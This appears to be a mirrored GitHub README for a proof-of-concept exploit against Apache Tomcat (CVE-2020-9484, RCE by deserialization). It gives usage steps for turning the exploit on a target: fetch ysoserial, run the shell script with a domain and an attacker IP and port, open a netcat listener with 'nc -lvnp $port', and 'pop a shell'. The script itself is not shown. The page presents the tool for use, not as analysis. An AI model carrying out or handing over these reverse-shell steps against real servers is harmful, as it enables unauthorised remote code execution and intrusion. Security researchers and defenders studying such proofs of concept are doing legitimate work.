VICXOR / CVE-2020-9484

POC for CVE-2020-9484

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2020-9484

POC for CVE-2020-9484

Logo

POC for CVE-2020-9484

Apache Tomcat RCE by deserialization (CVE-2020-9484)
Explore the docs »

Getting Started

1. Clone this repository, then you will be able to use CVE-2020-9484 and modify the source code if needed.
2. Download ysoserial jar
3. place both CVE-2020-9484 and ysoserial.jar in the same directory
4. pop a shell!

Usage

A simple bash script has been written in order to streamline the usage of CVE-2020-9484.
Upon Exploitation you will need to have a netcat listener ready

nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port

CVE-2020-9484

About

POC for CVE-2020-9484


Languages

Language:Shell 100.0%